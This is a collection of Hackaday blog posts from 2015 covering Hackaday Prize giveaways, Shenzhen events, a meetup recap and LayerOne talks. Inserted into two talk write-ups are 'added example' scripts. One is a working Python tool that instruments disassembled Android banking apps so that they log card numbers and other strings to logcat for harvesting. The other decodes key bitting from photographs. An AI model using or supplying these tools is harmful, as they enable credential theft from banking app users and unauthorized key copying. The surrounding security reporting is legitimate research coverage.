$50k in Play: Awarding 65 Stickvise this Week

Pushing your circuit boards around the bench while trying to solder the components is a fool’s game. Clamp that board in place with a Stickvise you won from Hackaday! This week we’ll choose 65 projects to receive one of these PCB clamps. You must submit your project as a Hackaday Prize entry to be eligible. Do it now and you’ll be considered for our weekly prizes all summer long — they total $50,000 that we’re putting into your hands.

We’re particularly proud of the Stickvise story. It was posted as a project on Hackaday.io and immediately caught our eye as an interesting idea. We worked with [Alex Rich] as he made his way through the process of getting it ready for manufacturing and it just became available in the Hackaday Store.

Regarding your entry to win one: find a problem facing your community and start a project that helps to solve it. We’ve seen many great entries so far, but with so many prizes your chances of winning are still really good! We recommend adding a project log each week that discusses your progress and perhaps mentions what you would use the Stickvise for while progressing toward a working prototype. Even if you don’t think your idea can win one of the big prizes, a great idea and solid write up is definitely a contender for our $50k in Play weekly prizes. Just look at the projects that won last week:

Last Week’s 20 Winners of a Bulbdial Clock Kit

Congratulations to the creators of these 20 projects, which were selected as winners from last week. You will receive a Bulbdial Clock Kit. It takes the concept of a sundial and recreates it using a different color of LED for each hand of the clock. This is our favorite soldering kit. It ventures a bit away from our mission of awarding tools and supplies to help with your entry, but sometimes you just need to have some fun!

Each project creator will find info on redeeming their prize as a message on Hackaday.io.


The 2015 Hackaday Prize is sponsored by:

Hackaday Prize Worldwide: Shenzhen

That’s right, we’re headed to the epicenter of electronics manufacturing next month: Shenzhen, China. We have a ton planned and this is the quick and dirty overview to get you thinking. If you are in the area (or are itching to travel) join us for a week of hardware hacker culture. Highlights for our tour include:

  • Meet Up on June 18th – (RSVP details coming soon)
  • Zero to Product PCB Workshop on June 19th – RSVP Now
  • Hackaday Talks presented at Maker Faire Shenzhen on June 19th and June 21st
  • Hackaday Booth at MFSZ on June 20-21

Zero to Product Workshop at MakerCamp Shenzhen

MakerCamp brings 30 talented Makers, Hackers, Designers, and Engineers together for a few days to build a makerspace inside of a shipping container.

We won’t be part of that build team (registration is open until 6/1 if you want to be). We will be supporting the event as part of the workshops that help celebrate the completion of the space. A mobile hackerspace full of interesting tools is one thing. But the sharing of knowledge, experience, and skill is what truly makes a hackerspace work.

Our Zero to Product workshop, created by [Matt Berggren], has been generating a ton of buzz and will be offered at Shenzhen MakerCamp.

RSVP for the Workshop

The workshop runs from 10am to 6pm on Friday, June 19th on the grounds of Maker Faire: Shenzhen. The event covers PCB design and at the end you will have laid out a development board for use with the ESP8266 WiFi module.

The workshop in LA a few weeks ago was completely sold out, so this is another chance to join in. If Shenzhen is a bit too far for you to travel, we are also planning the next installment in San Francisco on June 13th.

Hackaday Shenzhen Meetup

If you just want to hang out, so do we! On the night of Thursday, June 18th we’ll be rolling into an area bar for a tasty beverage and a night of interesting conversation. As always, we want to see the hardware you’ve been working on. We do recommend bringing things that fit easily in your pocket or backpack since we’re meeting up to spend some time with other Hackaday community members in the area.

We don’t have the location nailed down for this one. Check this post again as we’ll be adding it here. And if you have a bar to suggest to us please leave a comment below.

The picture above is from just a few weeks ago. We had a huge turnout for the BAMF meetup. There was a ton of hardware on hand which makes for really easy conversation as you meet other hackers for the first time.

Talks by [Mike] and [Sophi] plus Booth at Maker Faire Shenzhen

[Mike] is giving a talk on Friday, June 19th about the power of Open Design to move education forward. [Sophi] will be presenting her talk on Sunday, June 21st about making stuff that matters and working on research equipment used to investigate the world around us such as solar, medicine and disease.

Come to the Faire to hear our talks, but make sure you swing by the Hackaday booth as well. We’ll be bringing some of our most favorite projects to exhibit but we can’t resist the opportunity to do something interactive. Stop by and build an oscillator, wire up a sequencer, and create your own rudimentary music based on [Elliot Williams’] series Logic Noise.

Tag Along with Hacker Camp Shenzhen?

One of the adventures we’ve always wanted to take part in is Hacker Camp Shenzhen, which is run by Hackaday alumnus and Hackaday Prize Judge [Ian Lesnet]. The week-long camp leverages [Ian’s] knowledge of the area, manufacturers, markets, and people to provide tours and workshops for those interested in manufacturing. It just so happens that HackerCamp lines up the same week as all of the Hackaday events. We can’t take part in the entire thing, but are hoping that we have a free day to meet up (and possibly tag along) with the HackerCamp crew.


The Ease of Adding Trojans to Major Financial Android Apps

This was both an amusing and frightening talk. [Sam Bowne] presented How to Trojan Financial Android Apps on Saturday afternoon at the LayerOne Conference. [Sam] calculates that 80-90% of the apps provided by major financial institutions like banks and investment companies are vulnerable and the ease with which trojans can be rolled into them is incredible.

Some Background

[Sam] did a great job of concisely describing the circumstances that make Android particularly vulnerable to the attacks which are the subject of the talk. Android programs are packaged as APK files, which are ordinary zip archives and trivial to unpack. The compiled Dalvik bytecode inside can be disassembled into smali, an assembler-style listing that is readable in much the same way as the original Java. It’s super easy to unpack and then search this code using grep. Once the interesting parts are located, the smali can be edited, reassembled, and the whole thing repackaged. The app will need to be re-signed, but Google doesn’t control the signing keys; Android accepts self-signed certificates, so an attacker simply generates a new key and signs the modified app with it. The user still needs to install the file, but Android allows app installation from webpages, email, etc., so this isn’t a problem for the bad guys either. The one thing the new certificate can’t do is install over a copy already signed with the bank’s key, so the trojaned app has to be delivered as a fresh install.

The Attack

So what can be done with this? This is about information harvesting. [Sam’s] proof of concept uses a Python script to insert logging for every local variable. The script looks at the start of every method in the smali code, reads the number of local registers from its .locals directive, increments it by one, and uses that extra register to write the values out through logcat (Android’s system log, readable over ADB).
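Here is an added example of that instrumentation step in Python; it is not [Sam’s] script, and the sample smali class at the bottom is constructed for the demo rather than taken from any real app. It rewrites each method’s .locals count, then uses the new register as the tag argument of android.util.Log.d() wherever a string lands in a local register (a const-string, a String field read, or the move-result-object after a call returning String). The LOG_TAG value and the hypothetical com.example class are assumptions; the null guard and the v0–v15 register limit are the two things a practitioner trips over first when doing this by hand.

```python
"""Smali instrumentation in the spirit of the technique described in the talk:
give every method one extra register and use it to Log.d each string that
lands in a local register. Added example, not Sam Bowne's script. The sample
class at the bottom is constructed for the demo, not taken from any real app."""
import re

LOG_TAG = "HARVEST"  # assumption: whatever tag the attacker later greps for in logcat
LOG_D = "Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I"

# Cases where the destination register is known to hold a java.lang.String:
# a const-string, a field read whose type descriptor is String, or a
# move-result-object that directly follows an invoke returning String.
CONST_STRING = re.compile(r"^\s*const-string(?:/jumbo)?\s+(v\d+),")
GET_STRING = re.compile(r"^\s*[is]get-object\s+(v\d+),.*:Ljava/lang/String;\s*$")
INVOKE_STRING = re.compile(r"^\s*invoke-.*\)Ljava/lang/String;\s*$")
MOVE_RESULT = re.compile(r"^\s*move-result-object\s+(v\d+)")
LOCALS = re.compile(r"^(\s*)\.locals\s+(\d+)")  # only the baksmali .locals form is handled


def log_hook(indent, tag_reg, val_reg, n):
    """Emit a null-guarded Log.d(tag, value); Log.d throws on a null message."""
    return [
        f"{indent}if-eqz {val_reg}, :harvest_skip_{n}",
        f'{indent}const-string {tag_reg}, "{LOG_TAG}"',
        f"{indent}invoke-static {{{tag_reg}, {val_reg}}}, {LOG_D}",
        f"{indent}:harvest_skip_{n}",
    ]


def instrument_method(lines):
    """Rewrite one .method ... .end method block. Returns (lines, hooks_added)."""
    locals_idx = next((i for i, l in enumerate(lines) if LOCALS.match(l)), None)
    if locals_idx is None:
        return lines, 0  # abstract or native method: no register frame to grow
    m = LOCALS.match(lines[locals_idx])
    n = int(m.group(2))
    tag_reg = f"v{n}"
    # Plain invoke-static encodes registers in 4 bits, so only v0..v15 are
    # addressable; bigger frames would need invoke-static/range. Skip them.
    if n > 15:
        return lines, 0
    out = lines[:locals_idx] + [f"{m.group(1)}.locals {n + 1}"]
    hooks = 0
    after_string_call = False
    for line in lines[locals_idx + 1:]:
        out.append(line)
        match = CONST_STRING.match(line) or GET_STRING.match(line)
        if not match and after_string_call:
            match = MOVE_RESULT.match(line)
        after_string_call = bool(INVOKE_STRING.match(line))
        if match and int(match.group(1)[1:]) <= 15:
            indent = line[: len(line) - len(line.lstrip())]
            out.extend(log_hook(indent, tag_reg, match.group(1), hooks))
            hooks += 1
    return out, hooks


def instrument(smali):
    """Instrument every method in a smali file. Returns (new_text, hooks_added)."""
    out, block, total = [], None, 0
    for line in smali.splitlines():
        if line.lstrip().startswith(".method"):
            block = [line]
        elif block is not None:
            block.append(line)
            if line.lstrip().startswith(".end method"):
                new_lines, hooks = instrument_method(block)
                out.extend(new_lines)
                total += hooks
                block = None
        else:
            out.append(line)
    return "\n".join(out) + "\n", total


# Constructed sample: an enrolment handler that reads a text field and posts it.
SAMPLE = """\
.class Lcom/example/Enroll;
.super Ljava/lang/Object;

.method public submit(Landroid/widget/EditText;)V
    .locals 2
    invoke-virtual {p1}, Landroid/widget/EditText;->getText()Landroid/text/Editable;
    move-result-object v0
    invoke-interface {v0}, Landroid/text/Editable;->toString()Ljava/lang/String;
    move-result-object v1
    const-string v0, "CARDNUM"
    invoke-static {v0, v1}, Lcom/example/Api;->post(Ljava/lang/String;Ljava/lang/String;)V
    return-void
.end method
"""

if __name__ == "__main__":
    text, hooks = instrument(SAMPLE)
    print(text)
    print(f"{hooks} log hooks inserted")
```

Run against a directory produced by baksmali, the rewritten files reassemble as usual; the harvested values then show up under the HARVEST tag in adb logcat. Because the parameter registers are written as p0, p1, … in smali, growing .locals does not disturb them, which is what makes the one-register trick so cheap.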

ADB Log shows the Credit Card Number

He demonstrated live on the Bank of America app. From the user side of things it looks exactly like the official app, because it is the official app. However, when you register your account the log reports the card number as you can see here. Obviously this information could easily be phoned-home using a number of techniques.

As mentioned, the vast majority of banking and financial apps are vulnerable to this, but some have made an attempt to make it more difficult. He found the Bancorp app never exposes this information in local variables, so it can’t just be logged out. However, the same trojan technique works as a keylogger, since he found the same function kept getting called every time a key is pressed. The same was true of the Capital One app, but it echoes Android key-code (keymap) values rather than ASCII characters; easy enough to translate back into readable data, though.

The Inability to Report Vulnerabilities

What is most troubling is that none of these companies have a means of reporting security vulnerabilities. It was amusing to hear [Sam] recount his struggle to report these issues to Charles Schwab. Online contact forms were broken and wouldn’t post data, and several publicly posted email addresses bounced. When he finally got one to accept the email, he later discovered another user reporting on a forum that nobody ever answers back on any of the Schwab accounts. He resorted to a trick he has used many times in the past: Tweeting at the CEO of Charles Schwab to start a direct-message conversation. This is itself a security problem, as @SwiftOnSecurity points out: whenever @SamBowne Tweets at a CEO it’s because he found a vulnerability in that company’s platform and can’t find a reasonable way to contact the company.

There is Hope

Although very rare, sometimes these apps do get patched. The Trade King app was updated after his report, and when [Sam] tried the exploit again it crashed at start-up. The log reports a verification failure. This indicates that the injected code is being noticed, but [Sam] wonders whether the verification is included in the app itself. If it is, then it is just more smali: it will be possible to track it down and disable it along with everything else.

This may sound like all of us Android users should despair, but that’s not the case. Adding verification, even if it’s possible to defeat, does make the apps safer; attackers may not want to invest the extra time to try to defeat it. There are also commercial obfuscators, available for a few thousand dollars, that make these attacks much more difficult by making names unreadable. The free obfuscator shipped with the Android development tools doesn’t rename everything: local variables are left unaltered, and programmers have a habit of using descriptive names for variables. For instance, BofA used “CARDNUM” in the example above.

The Slides

[Sam Bowne’s] slides and testing results for the entire talk are available under the “Upcoming Events” part of his website.

Pictures that Defeat Key Locks

We’re at LayerOne this weekend and one of the talks we were excited about didn’t disappoint. [Jos Weyers] presented Showing Keys in Public — What Could Possibly Go Wrong? The premise is that pictures of keys, in most cases, are as good as the keys themselves. And that pictures of keys keep getting published.

[Jos] spoke a bit about new services that offer things like 3D scanning and storage of your key for printing when you get locked out, or apps that ask you to take a picture of your key and they’ll mail you a duplicate. Obviously this isn’t the best of ideas; you’re giving away your passwords. And finding a locksmith is easier than finding a 3D printer. But it’s the media gaffes with important keys that intrigue us.

We’ve already seen the proof of concept for taking covert images to perfectly duplicate a key. But these examples are not so covert. One example is a police officer carrying around handcuff keys on a belt clip. Pose for a picture and that key design is now available to all. But news stories about compromised keys are the biggest offenders.

A master key for the NYC Subway was compromised and available for sale. The news coverage not only shows a picture at the top of the story of a man holding up the key straight on, but also this image of it lying on a subway map, which can be used to determine scale. This key, which is still published openly on the news story linked above, opens 468 doors in the subway system, and these are more than just the ones that get you onto the platform for free. We were unable to determine if these locks have been changed, but the sheer number of them has us thinking that it’s unlikely.

Worse was the availability of fire-department master keys which open lock boxes outside of every building. (Correction: these are fire department keys but not the actual lock-box keys.) The locksmith used to cut the original keys went out of business and sold off all their stock. These keys were being sold for $150, which is bad enough. But the news coverage showed each key on a white background, straight on, with annotations of where each type of key will work.

Other examples include video news stories about credit card skimmers installed in gas pumps — that coverage showed the key used to open the pump housing. There was also an example of speed camera control cabinet keys being shown by a reporter.
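To make the scale point concrete, here is an added example (not from [Jos’] talk) of what an attacker does with one of these photos: a reference object of known size gives pixels per millimetre, the manufacturer’s spacing says where along the blade to measure, and a depth table snaps each measured blade height to a depth number. The key spec and the pixel measurements are constructed for the demo and do not describe any real keyway; the useful part is the confidence check, which flags a cut whose reading sits between two depths so it gets re-measured rather than guessed.

```python
"""Reading a bitting code off a key photo: a scale reference gives pixels per
millimetre, the manufacturer's spacing says where to measure, and the depth
table snaps each measured blade height to a depth number. Added example, not
from Jos Weyers' talk; the spec and the measurements below are constructed
and do not describe any real keyway."""
from dataclasses import dataclass


@dataclass(frozen=True)
class KeySpec:
    name: str
    first_cut_mm: float     # shoulder to the centre of cut 1
    spacing_mm: float       # centre-to-centre distance between cuts
    cuts: int               # number of cut positions
    blade_height_mm: float  # uncut blade height, i.e. depth number 0
    step_mm: float          # height removed per depth number
    depths: int             # depth numbers run 0 .. depths-1


# Constructed for illustration only; real specs differ per manufacturer.
DEMO_SPEC = KeySpec("demo-5pin", 6.0, 4.0, 5, 8.4, 0.6, 10)


def pixels_per_mm(reference_px, reference_mm):
    """Scale from anything of known size in the frame (the subway map, a ruler)."""
    return reference_px / reference_mm


def measure_x_px(spec, shoulder_x_px, ppm):
    """Pixel columns at which to read the blade height, one per cut position."""
    return [round(shoulder_x_px + (spec.first_cut_mm + i * spec.spacing_mm) * ppm)
            for i in range(spec.cuts)]


def decode_cut(spec, height_mm, tolerance=0.3):
    """Snap one measured blade height to a depth number.

    Returns (depth, confident). confident is False when the reading lies more
    than `tolerance` of a step away from the nearest depth: a copy cut from it
    may bind, and the decoder should say so rather than silently guess."""
    raw = (spec.blade_height_mm - height_mm) / spec.step_mm
    depth = min(max(round(raw), 0), spec.depths - 1)   # clamp out-of-range readings
    return depth, abs(raw - depth) <= tolerance


def decode_bitting(spec, heights_px, ppm):
    """Blade heights in pixels at each cut position, bow to tip, to depth numbers."""
    return [decode_cut(spec, px / ppm) for px in heights_px]


def format_bitting(decoded):
    """'3 6? 1 9? 5': a trailing ? marks a cut that should be re-measured."""
    return " ".join(f"{d}{'' if ok else '?'}" for d, ok in decoded)


# Constructed measurements: a 50 mm ruler spanning 1000 px in the photo, and
# the blade height in pixels at each of the five cut positions, bow to tip.
PPM = pixels_per_mm(1000, 50)
SAMPLE_HEIGHTS_PX = [132, 101, 156, 64, 110]

if __name__ == "__main__":
    print("measure at x =", measure_x_px(DEMO_SPEC, 200, PPM))
    print("bitting:", format_bitting(decode_bitting(DEMO_SPEC, SAMPLE_HEIGHTS_PX, PPM)))
```

The tolerance is the whole game: a 6000×4000 frame gives far more than one pixel per depth step, so a straight-on shot with anything of known size beside it decodes cleanly, and only off-axis or low-resolution photos produce the question marks.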

[Jos’] example of doing the right thing is to use a “prop” key for news stories. Here he is posing with a key after the talk. Unfortunately this is my own house key, but I’m the one taking pictures and I have blurred the teeth for my own security. However, I was shocked during image editing at the quality of the outline in the image — taken at 6000×4000 with no intent to make something that would serve as a source for a copy. It still came out remarkably clear.

Some locks are stronger than others, but they’re all meaningless if we’re giving away the keys.

See You at LayerOne this Weekend

LayerOne, the first level of security. [Brian Benchoff] and I are excited to take part in our first LayerOne conference this Saturday and Sunday in Monrovia, California.

Anyone in the Los Angeles area this weekend needs to get out of whatever they have planned and try out this conference that has a soul. Get the idea of a mega-con out of your head and envision a concord of highly skilled and fascinating hackers gathering to talk all things computer security. Speakers will cover topics like researching 0day exploits, copying keys from pictures taken in public, DDoS attacks, social engineering, and more.

It’s not just talks, there is a ton of hands-on at LayerOne as well. I plan to finally try my hand at lock picking. Yep, I’ve covered it multiple times and we’ve even had a session led by [Datagram] at the Hackaday 10th Anniversary but I’ve never found time to give it a roll. Of course electronics are my game and [Brian] and I will both be spending a fair amount of time in the hardware hacking village. We’ll have a bunch of dev boards along with us if you want to try out an architecture with which you’re unfamiliar. This year’s LayerOne badges are sponsored by Supplyframe; we’ll have something in store for the best badge hacks we see during the weekend.

See you there!

$50k in Play: 20 Bulbdial Clock Kits

For this week we’re veering away from our habit of giving away things to help with your build and giving away something fun. 20 Hackaday Prize entries will receive a Bulbdial Clock kit. Getting into the running is easy, start your project on Hackaday.io and make sure you officially submit it to the Hackaday Prize. Get it in by next Wednesday to be considered for this week’s prizes, and you’ll also be in the running each week after that as we work our way through $50,000 in prizes this summer before giving away the big stuff like a Trip into Space and $100,000 in cash.

The Bulbdial Clock has been a favorite of ours for years. Developed by Hackaday Prize Judges [Windell] and [Lenore] at Evil Mad Scientist Labs, it uses three rings of colored LEDs to cast shadows as clock hands. It’s a fun solder kit that will take time to assemble. In keeping with that ideal, your best bet at scoring one this week is to post a new project log showing off the solder work you’ve done on your prototype. If you don’t have one soldered yet, that’s okay too. Just post a new project log that talks about the component assembly you’ll be working on. This would be a great time to finally draw up a basic schematic, right?

Last Week’s 40 Winners of $50 Shapeways Gift Cards

Congratulations to the creators of these 40 projects, which were selected as winners from last week. You will receive a $50 gift card from Shapeways so that you can get your custom parts 3D printed. We were on the lookout for projects that we thought would benefit most from custom parts. Some of these are far along in their development, some have just started, but all of them are awesome, so browse the list and make sure to skull and follow the ones you like!

Each project creator will find info on redeeming their prize as a message on Hackaday.io.


Hackaday BAMF Meetup Reaches Critical Mass and Overflows Awesome

I love the Hackaday crowd. Despite a long day standing at a booth or crawling the fairgrounds as a spectator, everyone still made it on Saturday night to the 2nd Annual Hackaday BAMF meetup and made it one for the annals of hacker history. Just look at that crowd… I see a couple of Hackaday Prize Judges, a friend I met in Germany (who I actually found out I first met at this same event last year), and many many more great people. I don’t want to spoil the fun so check out the full size over on [Rich Hogben’s] photo log and see how many you can identify.

We started this gathering last year as a come-as-you-are and bring-what-you’re-proud-of after party to Bay Area Maker Faire. We don’t rent out the bar — O’Neil’s Irish Pub in San Mateo — but we had a handshake agreement for drink tickets (thank you to Supplyframe for buying the first round for everyone) with the bartenders. The place feels like the perfect size, and before long we were packed into every available space. The ramp to the restroom area in the back was a gauntlet of conversation — enough room to walk by but you felt like you were interrupting people talking to those across from them.

The amount of hardware on hand was spectacular. Taking pictures of it was tough in the tight quarters. I got a look at the first prototype of the Pebble smart strap. I really enjoyed seeing OSHChip (pictured above) which is an ARM Cortex-M0 chip and BLE rolled into a DIP-16 form factor. [Sophi’s] HeartBeat Boombox was a big hit; it uses the heartrate and blood oxygen sensors seen above to drive a drumbeat. Those blinky glasses should look familiar. [Garrett Mace] and his colleague [Jason] were on hand. These Macetech glasses are from a couple of years back but don’t worry, they were sporting the newest RGB flavor which I’m told will have black solder mask and integrated controller among other tasty goodies.

Perhaps the best way to tell the success of the night is that there were a lot of friends in the room that I never realized were even there. The next day I met up with [Sarah Petkus] and [Mark Koch] and was surprised to find they had been at the Hackaday meetup and I missed them. The same thing happened when I looked at [Rich’s] album from the night and saw [Trey German] was there too. I wasn’t hiding and I wasn’t stuck in one conversation, it was just that kind of a party that makes the room feel like a TARDIS but somehow the night doesn’t last forever.

It’s hard to imagine BAMF without this Saturday gathering. If you missed it this year, add it to your calendar for next.